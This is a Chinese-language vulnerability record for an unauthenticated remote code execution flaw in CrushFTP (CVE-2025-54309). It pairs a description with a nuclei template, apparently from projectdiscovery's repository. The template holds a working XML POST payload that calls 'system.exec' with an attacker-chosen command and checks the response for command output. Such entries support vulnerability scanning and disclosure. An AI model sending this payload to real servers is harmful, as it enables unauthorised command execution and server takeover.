漏洞信息
漏洞名称: CrushFTP Unauthenticated RCE
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: CrushFTP是一款广泛使用的文件传输协议服务器软件,支持多种文件传输协议,如FTP、SFTP、HTTP等,常用于企业环境中进行文件共享和传输。由于其功能强大和易于管理,CrushFTP在多个行业中有广泛的应用。该软件存在一个未认证的远程代码执行漏洞,攻击者无需任何认证即可利用此漏洞在服务器上执行任意命令。漏洞的技术根源在于CrushFTP的Web接口未能正确处理用户提交的XML数据,导致攻击者可以通过构造特定的POST请求,注入并执行恶意命令。这一漏洞的利用可能导致服务器完全被控制,攻击者可以执行任意系统命令,窃取敏感数据,甚至利用服务器作为跳板进行进一步的网络攻击。由于漏洞的利用无需认证,且可以远程触发,其安全风险被评估为严重级别。
产品厂商: CrushFTP
产品名称: CrushFTP
来源: https://github.com/projectdiscovery/nuclei-templates/blob/899e4d3da3103d38b6ebd53dfa9a5aefa78f3015/CVE-2025-54309.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| id: CVE-2025-54309 info: name: CrushFTP Unauthenticated RCE author: ANshu Bind severity: critical description: | Exploits an unauthenticated remote code execution vulnerability in CrushFTP servers, allowing attackers to execute arbitrary commands or perform malicious actions. tags: rce,unauthenticated reference: - https://www.cvedetails.com/cve/CVE-2025-54309 variables: cmd: "id"
http: - raw: - | POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} User-Agent: CrushExploit/2.0 Accept: */* Content-Type: application/xml
<?xml version="1.0"?> <methodCall> <methodName>system.exec</methodName> <params> <param> <value> <string>{{cmd}}</string> </value> </param> </params> </methodCall>
matchers-condition: and matchers: - type: word part: body words: - "uid=" - type: status status: - 200
|